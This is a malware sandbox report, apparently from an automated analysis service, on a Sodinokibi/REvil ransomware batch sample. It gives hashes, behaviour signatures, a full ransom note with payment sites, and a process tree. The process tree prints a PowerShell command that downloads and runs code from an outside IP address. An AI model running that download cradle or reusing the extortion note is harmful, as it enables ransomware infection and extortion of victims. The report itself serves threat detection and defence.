Overview

overview

10

Static

static

484333e52a...66.bat

windows7_x64

10

484333e52a...66.bat

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    01-09-2020 20:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    484333e52a633dd4ddba453c88728166.bat

  • Size

    220B

  • MD5

    78a20a9e11dcafee6975c27337f224f6

  • SHA1

    bf2f2d540d8c622f2c35950b2517e06bd1ffa085

  • SHA256

    bdb3f36c480f19ec8d2aa9a181d0f606f53586ba44e2065be4b5a94cc4460913

  • SHA512

    206fdef2f70c68a78c5a261d15e795faf814384a3124f9dc149ce215eb15e9b2fb7dea1aef79183228a5af6d014bd3dc6cacaaab6b9cbeaf81d95475406717ab

Score
10/10
ransomwarepersistencesodinokibi

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/484333e52a633dd4ddba453c88728166

Extracted

Path

C:\19887099q-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 19887099q. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA0CFA7B45EE3878 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/CA0CFA7B45EE3878 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: PxSOabVFKvF13vcc1DGq7Vw+RSmXz1XiuDkezAkUNgdCm0YT+UHvKU0wN8z3UqxR 413IIlkfYzMa+NFtrd/E9RHW0zo92z+YIZylrRDPqPnCgNE2aGrVXAg7I/9dy1hM BLabKaFIBEho0Gz7gGSta06oUTlgCmjdgd7md2KIuHoUgPcSPLWZ/ZPmrz6crRX/ UdHxDt6kI3AS0caxPwiuRgYHKji8XctPDxJAJYmCnW0kKQdE1VPaR3dXphjujwAB LRL3DsWBJ2hnkW1qVRlE3MiPawamnWKmYbxHGMXfqD9NYk1lQ/4NV0auF1oEIS+X DnL5dpREobsd+JXB6rvCxidLLu6kY+L7+M3jrR2WiajTnyKXUfiTQBSQWT0Hw/wF S0vyl2d6EBACIwU1mWl31KUbXSqFNSVEz78AGC3VE4gJpRzynlwsu+mhd1+kMRl1 QlHMDsF0m3jrGqVw/BKP20HxUy8sCeLSrdTjRg7vOSSY6O55vmEgSYd4EQZw+d4N PjTZ2tGqxTyx0kNt0h3FW1w4KW2Hl999jGY5pMV+50upS0mn4FCqoC6KmMdAYHAF AE8471whT0K+AYUgaPNO5KLHNb0OOPaSzHZ7i/ucTDbo14R9nzxXDoVjh+BosQ7B ofLop36kR82UBkyL+ua8mnHRTQcTeR6gc3KhNcGNcvk6n/H9NMQNiiCfxZZ6r55I nupsNw321cM/t0rw6w8v0lbeb0MhzrZFcqKjBUmlIeR/4b+gnwdFcNuh8psp9060 PBVoiAxXDsAQelJlNCkIKtmPAvwzA5wWYXhW7EpZsuCK+E0k8K6T7OxtHHRI26Cv QlGAOX077CZD1oiChIBaIyNE6Ab5o5kT4r/RlShDZalBGvVoAsueo0Cuw8SvqTNh vVgFclBZQ4O4AOpLiyOm/4F3pEC+rYzoW9u3KJ+ypUIk76lS06Nmhz6EDSEgS8fA EfHsc+knk6EXwPri6ITlpLA2LOw2uiq1osCK8lMzYirBGsZe0A83Yw1F+agGw9wv Ix0DhTFlZJr9UX9O+IccsKYkPiSJHSLJS7Wzt25PfxQjUPZP0RcxjveS82nSQ8fW EjWr58WK4tDhzwUrfl4t5eEr7FJKXO6lHFdfMxcaPQbeDeOcva5liQBAFrWZTN+m yi11pZd4JvvOuZ6A3gQQqI80YbjPhOECVgHICc7Xkd51ojhJzfN/qnhwiNmVKdrO QyuJHynd4awLCWvgtpPc6Xmg0SUQ451UT/abVF7OSn9S0PQ8d4tc+3VSvcOZH1lQ US3p3OQ2vtjQKVXfGJVSAreVSPVHyQ== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA0CFA7B45EE3878

http://decryptor.cc/CA0CFA7B45EE3878

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Blacklisted process makes network request 38 IoCs
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 5 IoCs
    persistence
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 15 IoCs
  • Drops file in Windows directory 1 IoCs
  • Modifies data under HKEY_USERS 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\484333e52a633dd4ddba453c88728166.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3888
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/484333e52a633dd4ddba453c88728166');Invoke-ZRFBQPCGMEHHZ;Start-Sleep -s 10000"
      2⤵
      • Blacklisted process makes network request
      • Modifies extensions of user files
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3944
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
    1⤵
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Suspicious use of AdjustPrivilegeToken
    PID:628
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:3084

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3944-0-0x0000000000000000-mapping.dmp

    Download

  • memory/3944-1-0x0000000074080000-0x000000007476E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/3944-2-0x00000000069A0000-0x00000000069A1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3944-3-0x0000000007010000-0x0000000007011000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3944-4-0x0000000006CD0000-0x0000000006CD1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3944-5-0x0000000006E70000-0x0000000006E71000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3944-6-0x0000000006EE0000-0x0000000006EE1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3944-7-0x0000000007640000-0x0000000007641000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3944-8-0x0000000006E00000-0x0000000006E01000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3944-9-0x0000000006E20000-0x0000000006E21000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3944-10-0x0000000007C50000-0x0000000007C51000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3944-11-0x0000000009380000-0x0000000009381000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3944-12-0x00000000088F0000-0x00000000088F1000-memory.dmp

    Filesize

    4KB

    Download